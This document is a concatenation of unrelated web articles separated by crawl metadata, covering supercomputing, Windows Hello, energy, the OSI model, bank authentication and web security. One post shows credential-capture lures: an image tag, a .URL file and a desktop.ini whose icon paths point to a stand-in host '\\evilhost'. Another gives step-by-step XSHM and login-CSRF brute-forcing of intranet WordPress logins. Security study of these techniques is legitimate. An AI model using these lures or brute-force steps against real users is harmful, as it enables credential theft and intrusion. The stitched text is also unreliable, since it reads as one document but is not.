Stanford University will receive $16 million over the next five years from the National Nuclear Security Administration (NNSA) to use supercomputers to find ways to increase the efficiency of solar energy concentrators. The research project involves developing new models that will help solve vexing engineering challenges on the next generation of exascale supercomputers. The crux of the research will focus on modeling complex physical and chemical interactions that take place in solar-thermal systems, which use mirrors to concentrate sunlight into a fluid that powers a turbine. Key variables that impact the efficiency of such industrial-scale solar systems include the alignment of the mirrors and the size of fine particles that are suspended in the fluid to serve as energy conduits. The research at Stanford will focus on better understanding and modeling these variables, according to Gianluca Iaccarino, an associate professor of Mechanical Engineering and the leader of the new research project at Stanford. “We need to rigorously assess the impacts of these sensitivities to be able to compute the efficiency of a system like this,” Iaccarino said in a news story that appeared on the Stanford website. “There is currently no supercomputer in the world that can do this, and no physical model.” Thus, the need for an exascale supercomputer, which is the second part of the NNSA’s directive. The NNSA and the Department of Energy have set an ambitious goal to develop an exascale supercomputer by 2018. Meeting that deadline is a major challenge in its own right. “The supercomputer paradigm has reached a physical apex,” Iaccarino said in the Stanford story. “Energy consumption is too high, the computers get too hot, and it’s too expensive to compute with millions of commodity computers bundled together. Next generation supercomputers will have completely different architectures.” The researchers will need to get creative and be flexible in their models, which will need to adapt to whatever architecture emerges in the exascale period. This basically amounts to “programming blind,” the Stanford story says. The research at Stanford will involve several of the university’s departments, including the Mechanical Engineering, Aeronautics and Astronautics, Computer Science, and Math departments. Stanford has a long history of multi-disciplinary research work in HPC, including a collaboration that started 15 years ago between the Computer Science Department and the Mechanical Engineering Department to solve physics problems on massively parallel computers. In addition to the computer work, Stanford will operate a physical experiment of the solar collector. The university will work with five other universities on the project, including the University of Michigan, the University of Minnesota, the University of Colorado-Boulder, the University of Texas-Austin, and the State University of New York-Stony Brook. Stanford, which was one of three universities selected by the NNSA for the project, will receive $3.2 million per year for the next five years. Other universities selected to house research centers under the NNSA’s Predictive Science Academic Alliance Program II (PSAAP II) include the University of Utah and the University of Illinois-Urbana-Champaign.
<urn:uuid:dc9e01b4-7ba6-4380-9396-538bc37b05e8>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/08/02/stanford_gets_federal_funding_to_bring_solar_research_to_exascale_levels/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00046-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931226
665
2.890625
3
Article by Alexey Tuyrin from DSecRG
Today we will talk about client-side attacks. An attack on a network is a progressive process. Usually, we escalate our rights step by step from nothing to domain administrator. Even casual unprivileged users can give us something interesting, for example access to some shared resources. But how can we get these user rights? We can force users to authenticate to a machine we control. There are at least three main ways to interact with a user. They are very abstract.
1) HTML and browser
We can use social engineering or a MitM attack like DNS poisoning to bring users to our web site with the following code: <img src="\\evilhost\test"> Their browsers will try to fetch the image from our server and give us their credentials. At the same time, users will not know about such actions.
2) Crafted document
We can create a special document (like an MS Excel file) and send it to users via e-mail or put it on shared resources. When a user opens it, the office program tries to connect to our server and gives us the user's credentials. We will talk about it in the next blog post.
3) Windows Explorer and shared resources
If we have permission to write to some shared resources (for example a file server or a directory on a terminal server), we can create a specially crafted file. When somebody browses to the folder with the file, Explorer will try to connect to our server without any interaction from the user. Such a crafted file can be:
- .LNK - Windows Shortcut File. It can specify an icon for the file; we can point the icon path at our server and Explorer will try to download it.
- .URL - Internet Location File. Like a LNK file it can point its icon at our server, but a URL file is a primitive text file, so we write the appropriate text and save it with a .URL extension (see the sketch after this article).
- desktop.ini - The file is used for folder customization. There are several fields (InfoTip, LocalizedResourceName, IconFile (IconResource for Vista/7)) which can give us the necessary links to our server. The fields influence Explorer in different ways (you can read about it here: http://www.tarasco.org/security/payload/index.html). One small limitation is that the folder containing desktop.ini should be marked 'system', which can be set with 'attrib +s folder_name'. But there are some pluses: desktop.ini files are 'hidden' by default, and folders like "My Documents", "Disc C (D, E, ...)", and "Desktop" are 'system' by default. A simple example of desktop.ini is also given after this article.
Cross-posted from Digital Security Research Group
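Here is a minimal sketch of what the two files described above might contain; the attacker host name (evilhost), the share and file names, and the innocuous-looking URL are illustrative assumptions, not values taken from the original post. An example .URL file (saved, for instance, as readme.url on a writable share):
[InternetShortcut]
URL=http://www.example.com/
IconIndex=0
IconFile=\\evilhost\share\icon.ico
And an example desktop.ini, placed in a folder that has been marked with attrib +s:
[.ShellClassInfo]
IconFile=\\evilhost\share\icon.ico
IconIndex=0
InfoTip=Shared project documents
When Explorer displays the folder or shortcut, it tries to retrieve the icon from the UNC path and silently authenticates to \\evilhost, handing over the user's credentials; on Vista/7 the IconResource field (e.g. IconResource=\\evilhost\share\icon.ico,0) plays the same role as IconFile.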
<urn:uuid:006f79b5-c297-453a-adb0-f3f68748fdc1>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/12805-SMBRelay-Attacks-on-Corporate-Users.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00166-ip-10-171-10-70.ec2.internal.warc.gz
en
0.840219
609
3.140625
3
For many people, passwords are the bane of online existence. Rely on one master password for all your logins and using the Internet can become a security threat. Use dozens of unique ones and it quickly becomes an annoyance. With Windows 10, Microsoft looks to resolve this problem for good. And by doing so, they hope to make the Internet and computer devices both safer and easier to use, for people around the world. Here’s how they intend to do it. The problem with passwords is simple – they can be stolen. And from Facebook to iTunes to Flickr and thousands more, nearly every major website and thousands of niche ones require a password to use. And because we Internet users are logging onto dozens of these sites and services everyday, it’s virtually impossible for us to create a unique, complex password for each one. So people resort to using only a handful of passwords, or even just one master password, since it’s easier. But of course, this poses a security risk. So what’s an Internet user to do? Microsoft Windows 10 is pioneering a new technology that is ready to flip this dated system on its head and eliminate the password problem for good. Passwords can be stolen easily, but how easy is it to steal a person’s physicality? Microsoft’s new technology, named Hello, uses biometrics – such as your fingerprint, or face or iris scan – to log into your computer, laptop or other device. This ensures that no one can login to your device but you. Well, what about using a photograph to login instead, you might ask? It won’t work. Using technology that takes a detailed map of your face in 3D, Hello is trained to reject the token photograph or selfie on login attempt. This makes it virtually impossible for anyone, besides you, to login to your device. Logging into your computer with biometrics is great, but what most users really want is a more secure solution to login to websites while not having to remember a bazillion passwords. This is where Microsoft’s Passport comes in. Passport allows you to login into applications and online content without the need for a password. For example, instead of using your typical password to sign into your Microsoft Windows Account, you can now use Windows 10 facial recognition (or other biometrics) to log you in instead. That means you can access Skype, Xbox Live, Office 365 and more without a standard password. In addition to your Microsoft Windows Account, you’ll be able to use the biometric capabilities of Passport to access thousands of enterprise Azure Active Directory online services. Bear in mind, though, that it will be quite some time before you can use Passport to replace all your standard logins, since not every website has implemented this technology yet. Want to hear more exciting Windows 10 news, or need assistance with your Windows device? Get in touch with one of our technology experts today.
Harnessing energy from renewable sources for self-sufficient electricity communities. This paper introduces the concept of Cloud Power: a community striving for electricity self-sufficiency based on energy from renewable sources. The concept is currently under development at Capgemini in cooperation with TexelEnergie in the Netherlands. Cloud Power provides the advantages usually associated with smart grids, but starts from the consumer’s point of view. The highly political nature of energy use has brought it into the public consciousness. Increasingly, people want to take control of their energy consumption, and in some cases are willing to pay a higher price if this reduces their environmental impact. Some consumers are willing to accept a reduction or interruption of supply given a fair remuneration. Still others think they are well-equipped to manage the risk of price volatility themselves. This is where Cloud Power comes in. Cloud Power aims to unite a relatively small group of consumers with a common approach to their energy supply, and enable them to define and jointly pursue their individual goals. This Cloud Power ‘community’ is opt-in, and revolves around common objectives that define the identity of that community. A typical Cloud Power community can be economically feasible for several hundred participants, and these participants don’t need to live near each other. Although the economies of scale provided by traditional energy companies are not available, by using technology and participants in an intelligent, responsive way, Cloud Power can be a democratic, competitive way of providing energy to consumers.
The Impact of Insider Threats – The South Korea Episode.

In Layman's Terms, What Happened? At the center of the story is an employee who was working as a software engineer for three credit card companies. Over the course of a year and a half, this employee copied data from corporate servers to his personal drive. What makes this story particularly interesting is that the software engineer was writing anti-fraud software for the firms he worked for during the same period that he was stealing data.

Business Impact? You Bet! According to Bloomberg, 27 executives resigned following this incident, including bank CEOs and other senior management. Over half a million credit card users have already asked for new credit cards, with many more to come. Perhaps the most significant impact is on the brand of the affected companies. Some companies never recover from the brand damage caused by such a massive security breach.

There are opportunities to prevent these sorts of breaches. Auditing and a properly deployed behavior-alerting system could and should have flagged abnormal behavior from a user with privileged access. In this case, a software engineer who needed access to perform his job was copying massive amounts of data over time. From a security standpoint, a simple "rule" that alerts IT when a user accesses massive amounts of sensitive data over time, as sketched below, would have stopped him in his tracks.
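The rule itself can be very small. The sketch below is only an illustration of the idea, not a description of any particular product: the event shape, the 30-day window and the 100,000-record threshold are all invented for the example, and a real deployment would run against database audit logs or a database activity monitoring tool rather than an in-memory array.

    // Hypothetical audit event: which user read how many sensitive records, and when.
    interface AccessEvent {
      user: string;
      records: number;
      timestamp: number; // epoch milliseconds
    }

    const WINDOW_MS = 30 * 24 * 60 * 60 * 1000; // look back 30 days (arbitrary)
    const THRESHOLD = 100_000;                  // records per window before alerting (arbitrary)

    // Return the users whose cumulative access volume over the window exceeds the threshold.
    function usersToFlag(events: AccessEvent[], now: number): string[] {
      const totals = new Map<string, number>();
      for (const e of events) {
        if (now - e.timestamp <= WINDOW_MS) {
          totals.set(e.user, (totals.get(e.user) ?? 0) + e.records);
        }
      }
      return [...totals.entries()]
        .filter(([, total]) => total > THRESHOLD)
        .map(([user]) => user);
    }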
Part One: Solid state disk technology explained.

The reliability of solid state disks has improved markedly in recent years. Flash memory has, in the past, had a frustratingly finite lifecycle, as each cell can only be written to so many times before the semiconductors lose the physical properties that make it possible for them to store data. Improvements to the technology are extending the devices' working lives to levels that compare comfortably with other types of drive. "The thing we do on the SSDs is spread the writes across the disk," says Intel's Casey. Modern SSDs also feature a technology called "wear levelling" that ensures the same cells are not written to all the time. "We are starting to see 2 million hours mean time between failure," Casey says. "We guarantee a million cycles of the cell – but a drive could produce five million. That translates into 350GB/day for five years for enterprise-class SSDs and 20GB/day for five years in drives for consumers."

SSDs' most visible role to date has been in laptop computers like the MacBook Air and some Lenovo, ASUS and Toshiba models. Used in this way, SSDs lower laptops' weight and boost their battery life, two desirable outcomes. SSDs are expected to become standard issue on laptops as soon as pricing permits.

In the enterprise, SSDs are expected to speed applications by taking on the role currently performed by fiber channel drives in enterprise arrays. "The problem with physical disks is that the head has to fly over the platter, find the data, then read it off," says EMC Australia's Clive Gold. SSDs do not have that physical chore to perform and therefore deliver data to their I/O bus more quickly than even the fastest conventional drives. "SATA I/O is a third the speed of fiber channel," Gold says. "Flash is thirty times as fast as fiber channel." SSDs will therefore, he believes, become the natural home for data that businesses know must be accessed quickly. The overwhelming majority of data will be stored on conventional disk, which will remain a viable technology for data like video that does not ask a hard disk to do a lot of physical work. But the data that applications request most often, and for which users are most sensitive to response times, will be placed on a tier of SSD that sits in the same array as conventional disk, to ensure that applications can retrieve it and present it to users (or to other computing devices) at pleasing speed.

Bringing this scenario to reality is not, however, as simple as connecting SSDs to an enterprise array and sitting back to enjoy the speed boost. Vendors of enterprise arrays carefully vet the drives they say will work in their machines, as different SSD manufacturers have different ways of processing I/O. Sun Microsystems Asia Pacific CTO Angus MacDonald believes SSDs have another role: replacing direct-attach storage in servers, to much the same end as the scenario that sees SSDs placed in storage arrays. But in either scenario, SSDs are likely to strain arrays, servers and networks. "SSD is so fast, it keeps responding and hogs resources. This creates a challenge for the way things like caching get done," says EMC's Gold. "You can only get eight to ten SSDs into a chassis before you saturate the cache," adds Sun's MacDonald.
Gold believes that EMC has applied its experience building large arrays to the problem of coping with SSDs' massive output, and that its quality-of-service and other controls make SSDs usable today. Sun's MacDonald says the company has similar tools in the short-term pipeline, but is also working to help would-be SSD users manage the challenge of automatically figuring out which data belongs on the new, fast SSD tier. MacDonald says his company is working to make this classification a function of its ZFS file system. "A definite direction for ZFS is getting an inherent understanding of what tier data belongs on," he says. Other vendors are taking similar steps to make sure that SSDs can deliver for the enterprise. And EMC's Gold believes that soon, those technologies will be pressed into service in the mainstream. "We have two or three years until fiber channel becomes obsolete," he says.
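Casey's remark about "spreading the writes across the disk" is the essence of wear levelling. The toy sketch below shows only that core idea, picking the least-worn block for each new write behind a logical-to-physical mapping; real SSD controllers add garbage collection, over-provisioning and static wear levelling, and every name here is invented for illustration.

    // Each flash block tracks how many program/erase cycles it has absorbed.
    interface Block {
      id: number;
      eraseCount: number;
    }

    class WearLeveler {
      private blocks: Block[];
      // Logical address -> physical block id, so the host never notices the shuffling.
      private mapping = new Map<number, number>();

      constructor(blockCount: number) {
        this.blocks = Array.from({ length: blockCount }, (_, id) => ({ id, eraseCount: 0 }));
      }

      // Place each logical write on the least-worn physical block instead of
      // hammering the same cells every time.
      write(logicalAddress: number): number {
        const target = this.blocks.reduce((a, b) => (a.eraseCount <= b.eraseCount ? a : b));
        target.eraseCount += 1;
        this.mapping.set(logicalAddress, target.id);
        return target.id;
      }
    }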
A new programming standard, called the Open Spatial Programming Language (or OpenSPL), debuted today “to enable the next generation of high performance parallel spatial computers.” The open standard was developed by the Open Spatial Programming Language (OpenSPL) consortium, which formed to promote the use of spatial computing among a wide set of users and to standardize the OpenSPL language. The overarching goal of the consortium is for spatial computing to become the industry standard for mission critical computations. The entire effort hinges on the well-supported idea that the future of computing is parallel. OpenSPL is based on the concept that a program executes in space, rather than in time sequence. It takes the current paradigm and turns it on its head. Operations are assumed to be parallel unless specified as sequential. The consortium explains that this is similar to a factory floor where all operations take place in parallel, with each operation carrying out a piece of the overall process. “Temporal Programming is a recipe for the execution of actions, whereas Spatial Programming builds a factory to execute the recipe,” is how the backers put it. “Conventional programs execute in 1 dimension, where time progresses forward following the instruction sequence. Spatial programming is programming in 2 dimensions, where data progresses forward in parallel across the fabric of an array or chip.” It’s a revolutionary view of computing with the potential of yielding significantly higher performance, compute density and energy-efficiency compared to traditional instruction-processor machines. With deterministic throughput and low latency at low power, spatial computing is well-matched to line-rate data processing applications, such as that used in high performance computing, datacenter networking and the Internet of Things. “OpenSPL enables us to build parallelized applications that fully take advantage of spatial computing technology with the ease of a high-level software project,” notes Ryan Eavy, executive director, Architecture, CME Group. A video on the consortium’s website explains the concept in greater detail. Spatial programming is also green, according to the OpenSPL consortium, since the amount of computation per cubic foot of datacenter space is maximized. The right applications can experience two orders of magnitude improvement in computational density, reducing power consumption accordingly, say backers. The OpenSPL consortium includes both industry and academic partners, and offers two levels of membership. Full members participate in all consortium activities, including voting, while observer members participate but may not vote. The consortium was founded by “full members” CME Group, Juniper, Chevron and Maxeler Technologies with Imperial College London, Stanford University, University of Tokyo and Tsinghua University contributing as “observer members.” The consortium is managed by a steering committee, currently chaired by Tamas Nemeth of Chevron. Activity is building for the effort. The first OpenSPL Summer School will take place July 2014, at Imperial College London. Researchers, students, and members of OpenSPL will gather together to share experiences, work on application development, and continue to advance the space computing paradigm.
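OpenSPL has its own syntax, defined by the consortium; the sketch below is deliberately not OpenSPL. It is only a conventional-language analogy for the "factory floor" idea quoted above: the temporal version walks one element at a time through an instruction sequence, while the pipelined version keeps both stages busy on every tick, each working on a different element. All names are invented for illustration.

    // Temporal style: one instruction stream, one element at a time.
    function temporal(data: number[]): number[] {
      const out: number[] = [];
      for (const x of data) {
        const a = x * 2; // stage 1
        const b = a + 1; // stage 2
        out.push(b);
      }
      return out;
    }

    // Spatial analogy: both stages exist side by side and fire on every tick,
    // like stations on a factory line handing work forward.
    function pipelined(data: number[]): number[] {
      const out: number[] = [];
      const feed = [...data];
      let atStage1: number | undefined;
      let atStage2: number | undefined;
      while (feed.length > 0 || atStage1 !== undefined || atStage2 !== undefined) {
        const finished = atStage2 !== undefined ? atStage2 + 1 : undefined; // stage 2 fires
        atStage2 = atStage1 !== undefined ? atStage1 * 2 : undefined;       // stage 1 fires
        atStage1 = feed.length > 0 ? feed.shift() : undefined;              // fetch next element
        if (finished !== undefined) out.push(finished);
      }
      return out;
    }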
Brainerd, Minn., is looking into new energy sources to heat and cool homes and businesses. Partnering with Minnesota-based company Hidden Fuels, the city plans to harness the heat in its sewers, reported National Public Radio. Many types of man-made geothermal energy systems exist around the world. But using heat trapped in sewers, which can build up from dishwasher waste or hot showers, is less common. The system will use technology similar to geothermal heating and cooling systems, but could potentially be less expensive because sewer water is already in the right temperature range (between 42 and 66 degrees Fahrenheit) and much of the infrastructure is already in place. The challenges come from the mess. "We're not dealing with clean fluids," Hidden Fuels' Peter Nelson said, reported NPR. "We're dealing with contaminated fluids. And so that's really the challenge ... to be able to operate efficiently in that contaminated environment." Though the system is not yet in place, at one location Hidden Fuels found enough thermal energy to heat 229 homes, reported inhabitat.com. The city also plans to have a sewer-heated police station by the end of this year.
The application layer is the top layer of the OSI (Open Systems Interconnection) model. The OSI model guides software developers and hardware vendors in the design of network communications products. When two systems need to communicate, they must use the same network protocols. The OSI model divides protocols into seven layers, with the lowest layer defining the physical connection of equipment and electrical signaling. The highest layer defines how an application running on one system can communicate with an application on another system. Middle layers define protocols that set up communication sessions, keep sessions alive, provide reliable delivery, and perform error checking to ensure that information is transmitted correctly. See "OSI (Open Systems Interconnection) Model" for more information on the complete OSI stack.

The application layer is the top layer in the OSI protocol stack. Applications that provide network features reside at this layer and access the underlying communication protocols. Examples include file access and transfer over the network, resource sharing, and print services. The OSI model specifies that applications must provide their own layer 7 protocols. The OSI FTAM (File Transfer Access and Management) utility and the X.400 electronic mail standard provide services at the OSI application layer.

In the Internet world, the application layer resides directly on top of the TCP/IP protocol stack. In this model, the presentation and session layers of the OSI stack are not implemented as separate layers; their functions are handled by the applications themselves, and the application layer talks directly with the transport layer (TCP and UDP). Common Internet applications in the application layer include Telnet, FTP (File Transfer Protocol), NFS (Network File System), SMTP (Simple Mail Transport Protocol), and DNS (Domain Name System).

Copyright (c) 2001 Tom Sheldon and Big Sur Multimedia.
There will likely be an assortment of meshes The mesh as I see it (and as backed up by some of my smarter friends) is basically the notion that there exists a vast group of devices that are somehow connected, sharing information and applications. The information is stored in many places, synchronized and shared through the network. Processing occurs both locally and remotely or "in the cloud." The information can pass from device to device without passing back through the hub, or Web. And this is why it's called a mesh and not the standard hub-and-spoke system that most computing, including software-as-a-service, is built on today, said a friend of mine. Moreover, in a true mesh, data is just data, and processing occurs where it needs to occur, be it remotely, locally or both.As an example: The protocol from a user's iPhone to his PC is through iTunes-a proprietary protocol. And the applications are written to a proprietary API set and iTunes itself is a proprietary network. But the device can still send data that an application on the user's Windows Mobile device can work with, which will come through their Exchange/ActiveSync connection. As long as there are gateways, it doesn't matter. That is the device mesh at work. And while it is still very early days for this concept and pioneers are taking the lead, it is likely that a lot of fuss will be made over the proprietary nature of this or that network or device. As long as the protocols and file formats can be converted, that is about as relevant as what weight paper you type your resume on. Jeremy Burton, CEO of Serena Software, said the platform shift to SOAs (service-oriented architectures) and Web services "allows you to have a standard way to interoperate and also it allows the location of an application (or services) to be irrelevant-on-premise, in the cloud, who cares? I think Microsoft realizes that for it to own the new world, it has to be in control of the standards that link [or mesh] this new world together. If these standards are all open, and everyone can write to them, then that would be bad for Microsoft. ... They potentially could be marginalized and their services swapped out for something else." And while Ozzie speaks broadly of a device mesh in a Microsoft-sponsored world, there will likely be an assortment of meshes, both proprietary and "open," if you will.
By John De Santis, CEO, TriCipher

Throughout 2006, a series of high-profile incidents occurred that very painfully and very publicly highlighted how flimsy usernames and passwords are in protecting a person's online identity. Phishing and various other forms of online fraud sent the e-business community--particularly in financial services, which bore the brunt of these attacks--into a tailspin. In a bold move, one of the world's largest banks aggressively promoted its deployment of multi-factor authentication as a free, required service to all of its online banking customers. Subsequently, many banks have followed suit, adopting technology designed to verify that the bank's Website was really the bank's Website, and that users were who they said they were. Generally, the enrollment process required people to choose an image to use as a unique identifier, write a brief phrase and select three challenge questions. The Website then dropped a cookie on the user's machine that gets passed back and forth between the user's computer and the bank to confirm each other's identities.

This process made customers feel safer, and demonstrated that banks were stepping up to the plate to protect their customers online. But where the cyber-rubber hits the road, they're relying on HTTP cookies for authentication--a method which is at best weak, and at worst, completely useless. As a quick refresher, the term "HTTP cookie" derives from "magic cookie," defined in Wikipedia as a packet of data a program receives but only uses for sending it again, unchanged. Already used in computing, magic cookies were "webified" by Netscape programmers while developing an e-commerce solution for one of Netscape's customers to implement a virtual shopping cart. From their inception, cookies have been fraught with both security and privacy issues. Cookies are easily hacked, often deleted by users (requiring frequent answering of security questions to view their accounts), and useless against Man-in-the-Middle (MITM) and Man-in-the-Browser (MITB) phishing attacks, which are occurring with increasing frequency. To be fair, cookies, passwords and images are more secure than passwords alone, but not by much. In a nutshell, they raise the bar from nothing to...almost nothing. As a consumer of online services, I can appreciate the initiative to ensure my safety without any major inconvenience--but if it's not buying me a safer experience, then what's the point?

When the cookie crumbles, then what? The justification for using cookies for consumer authentication is that it's a step up from what's currently being used (usernames and passwords) and doesn't interfere with the online experience. It all boils down to the classic battle between security and convenience--more security means more complexity, and if it becomes too much of a hassle to bank online no one's going to do it. So the big nut the banks, the FFIEC, the auditors, security vendors, analysts and market researchers are all trying to crack is what is "good enough" security--meaning, secure enough to actually protect people, without making the user experience so complicated that it drives them offline. It's not an easy question to answer. Gartner analyst Avivah Litan wrote a report highlighting the security flaws of cookie technology, stating that such a solution "... fosters consumer confidence but cannot be wholly relied on to effectively reduce fraud." She went on to say, "Online consumer service providers need a bifurcated strategy...
one piece to build consumer confidence and another piece to keep the crooks out." Unfortunately, the Gartner report came out after many banks had already followed suit in order to meet the tight window imposed by the December 2006 FFIEC deadline. The irony of the FFIEC guidance is that, while it intends to ensure that banks do the right thing to protect online customers, it leaves more than enough rope for banks to hang themselves on security. Given the short timeframe banks had to comply and the wide variety of choices they had to sift through, it's conceivable that banks would lean towards cookie-based technologies. They're an improvement over what they had and cookies provide them with an FFIEC checkmark. However, at the risk of raising the already nauseating level of fear-mongering that's par for the course in the security industry, I encourage you not to throw the baby out with the bathwater. Last year MITM attacks were widely perceived as a strictly theoretical threat. In 2006, these "theoretical threats" crippled a bank in Europe and compromised a major U.S. bank (despite its use of tokens) along with several brokerages in Canada. Cookies, and even tokens, would have been useless in stopping these attacks. People are noticing. An August 2006 Gartner survey revealed that almost nine million US adults have stopped using online banking, while another estimated 23.7 million won't even start because of fears over security. How many more users would defect if they knew they were being scammed by the very people promising to protect them? It certainly blurs the line between the good guys and the bad guys, doesn't it? When the cookie crumbles, everyone loses. So why let it happen?
Filming animals in the wild is notoriously difficult, as documentary makers can spend weeks waiting for that elusive shot. Filming outdoors, in typically difficult surveillance conditions, presents an extra challenge, and since many animals travel or feed under the cover of darkness, film crews need to make sure the footage they capture at night is every bit as dynamic and effective as the footage they capture during the day. The BBC recently aired a documentary entitled "Great Rift." The program focuses on the diverse wildlife in Africa's vast Great Rift Valley and in particular on a troop of approximately 100 baboons who have made their homes inside hollow volcanic lava tubes along the rift. These lava tubes protect the baboons from predators, particularly the big cats which prowl the barren landscape in search of prey. For the documentary, filmed in June 2009, the BBC crew used 10 of Bosch's IR illuminators. The crew installed the illuminators inside the lava tubes when the baboons left to feed, then crawled inside and awaited their return. Working in such dark and cramped conditions proved quite a challenge, but the illuminators made the film crew's commitment worthwhile, enabling them to capture previously unseen video footage of baboons in their natural habitat. As an added bonus, the crew were also able to film the nocturnal behavior of a large colony of bats which also inhabit the lava tubes. Bosch's illuminators were selected because they are compact and discreet, and powerful enough to enable broadcast-quality night-time filming. Series Producer Phil Chapman said, "With HD programs like Great Rift, image quality is all important. The degree of detail in our IR material was outstanding, you can see the fine detail of the baboons' fur and even tiny parasites crawling on the foot of a baby bat."
IBM predicts five innovations that will change our behaviour over the next five years.

As 3D and holographic cameras get more sophisticated and miniaturized to fit into mobile phones, people will be able to interact with photos, browse the web and chat with friends in the form of 3D holograms. Scientists are working to improve video chat to become holography chat - or "3-D telepresence". The technique uses light beams scattered from objects and reconstructs them into a picture of that object.

Batteries that react to the environment
Instead of the heavy lithium-ion batteries used today, scientists are working on batteries that use the air we breathe to react with energy-dense metal. If successful, the result will be a lightweight, powerful and rechargeable battery capable of powering everything from electric cars to consumer devices. These would lead to the development of battery-free electronic devices that can be charged using a technique called energy scavenging. Some wrist watches already use this - they require no winding and charge based on the movement of your arm. The same concept could be used to charge mobile phones, for example - just shake and dial.

Rise of the 'citizen scientist'
Sensors in phones, cars, wallets and even tweets will collect data that will give scientists a real-time picture of environments. Simple observations, such as when the first thaw occurs and when mosquitoes first appear, will provide a rich resource in datasets. Laptops will even be used to detect seismic activity. If connected to a network of other computers, this will help to map the aftermath of an earthquake quickly, speeding up the work of emergency responders and potentially saving lives.

Personalised commuter information
Advanced analytics will personalise recommendations for commuters, so they will be directed where to go in the fastest time. Adaptive traffic systems will intuitively learn traveller patterns and behaviour to provide more dynamic travel safety and route information than is available today. IBM researchers are developing new models that will predict the outcomes of varying transportation routes to provide information that goes beyond traditional traffic reports, after-the-fact devices that only indicate where you are already located in a traffic jam, and web-based applications that give estimated travel time in traffic.

Computers will help to energize your city
The energy poured into the world's data centres could be recycled for a city's use, to combat the excessive heat and energy that they give off. Up to 50% of the energy consumed by a modern data centre goes toward air cooling. Most of the heat is then wasted because it is just dumped into the atmosphere. But new technologies, such as on-chip water-cooling systems, mean that the thermal energy from a cluster of computer processors can be efficiently recycled to provide hot water for an office or houses.
Statistics from w3techs suggest that 1 out of 4 websites (around 25%) on the internet are powered by WordPress. WordPress' popularity is derived from its ease of setup and use, its contributing community, and the big repertoire of plugins and themes that are available.

Why is WordPress Such a Common Target?
Even though WordPress is a beginner-friendly web application, like every other platform it has its own issues and limitations. One of the most voiced security issues is that it is possible, and very easy, to bruteforce login credentials. WordPress' advice on this is to install a security plugin, protect the WordPress login page with a .htpasswd file (HTTP authentication), and of course use strong credentials. However, many users, especially inexperienced ones, do not take these extra security measures on board. They use very weak credentials and do not set up any additional layers of security on their websites, thus making WordPress a good target for brute force attacks.

How to Bruteforce WordPress Websites and Blogs Running on Internal Networks and Behind Firewalls
WordPress blogs aren't always used for publicly accessible websites. They are also frequently used as websites in intranets for employees. Typically, intranets are not reachable from the outside (the internet) because they are sitting behind a firewall. WordPress websites running in intranets are still at risk, though; attackers can effectively brute force a WordPress blog or website in an internal network via XSHM, without having direct access to it.

What is XSHM?
XSHM is an abbreviation for Cross Site History Manipulation. It is a leak in the Same Origin Policy, which is used by web browsers to prevent different websites from retrieving information from each other when a user is accessing them both. This means that website A cannot read the content of website B when both are accessed at the same time in different browser tabs. However, there are some side channel attacks that can be used to leak certain information even though the Same Origin Policy is in place. XSHM is one of them, and below is an example:

- An attacker creates an iframe on a website he controls (website A) and points it to a page on website B that has a conditional redirect. For example, the iframe points to login.php, which redirects the user to index.php if he is logged in.
- The attacker retrieves the history.length value of the browser tab.
- The attacker updates the iframe to point to index.php.
- When the user accesses the iframe again, the attacker retrieves the new value of the history.length property and compares it to the one from step 2. Since the web browser does not increase the history.length value if the URL the iframe is pointed to is the same as the URL it already shows, it is easy to determine if the user is logged into WordPress or not. Therefore, if the history.length value remains the same, it means that the user was redirected to index.php, which means he is logged in.

How to Identify WordPress Websites on a Local Network
WordPress has a unique redirect that makes it really easy for attackers to spot. If a user is not logged in and visits the page /wordpress/wp-admin/, he is redirected to wp-login.php with a redirect_to parameter pointing back to wp-admin (the full form of this URL appears later in this post). Therefore, to find WordPress websites on an internal network, an attacker can send the victim a link with an XSHM payload that tries the above redirect on a range of internal IP addresses, such as 192.168.1.1/24, when the user clicks the link.

How does bruteforcing WordPress logins work with XSHM?
Now that the attacker identified the WordPress websites he can start the brute force attacks with XSHM, even though he does not have direct access to it. This is possible due to the fact that WordPress does not have a token to prevent logins via CSRF. There is a general misunderstanding of whether or not CSRF Tokens are necessary in login forms. Note: Tokens in login pages are necessary. It is generally advised to secure your WordPress login page with Tokens to prevent these type of attacks. There are several other attack vectors that use the login CSRF as entry points, which are not obvious but can have serious impacts, such as logging the user in an attacker’s account without his knowledge and steal private information. It might also be possible to abuse an otherwise not reachable Stored Cross-site Scripting (XSS) vulnerability. WordPress also provides a redirect_to form field in its login, which lets the attacker specify where he wants the victim to be redirected after a successful login. This suits perfectly the attacker’s XSHM attack. He can now use a website which makes a CSRF attack based on GET parameters and supply different username / password combinations. The attack works as follows: - Retrieve the value of the history.length property of the victim’s browser tab. - Point the src of the iframe to the page that carries out the CSRF attack. This can be done by using a self-submitting form to the wp-login page with a username / password combination. - Point the iframe to the path from the redirect_to parameter - Check the value of the victim’s history.length From the value of the history.length property the attacker can now tell whether or not the attack was successful, because the attacker knows that a successful login means that wordpress redirected the user to the page in the redirect_to parameter. Therefore if the value of the history.length property does not increase, he knows that the attack was successful. The attacker is also able to tell if a CSRF attack worked under certain conditions, which usually isn’t possible due to Same Origin Policy. Proof of Concept Video Below is a proof of concept video of how WordPress websites running on internal networks can be identified, even when running behind a firewall, and how then a bruteforce attack is launched against them. Limitations and Problems of the WordPress Login Page Attack via XSHM The Attack is Easily Noticed In order for this WordPress attack to succeed the attacker needs at least two interactions from the victim: - First he must convince the victim to visit his malicious web page. - After that the victim must click a button or link on the attacker’s page that opens a new browser window or tab. This is required since it is not possible to open a new window or tab without user interaction, because of popup blockers. Since the victim can easily notice the new opened tab and the page refreshes the chances of the victim not noticing the attack are very slim. Also, the attacker can’t just create a simple iframe as the wp-login page is secured with X-Frame-Options. This might cause problems in some web browsers since they might not increase the history.length value if this header is set, thus could be very difficult for an attacker to determine if there is a WordPress or not. Different Browsers' Behaviour Complicates Matters Another problem is that some browsers such as Chrome always change the value of the history.length property, even if the attacker redirects the iframe to its current src. 
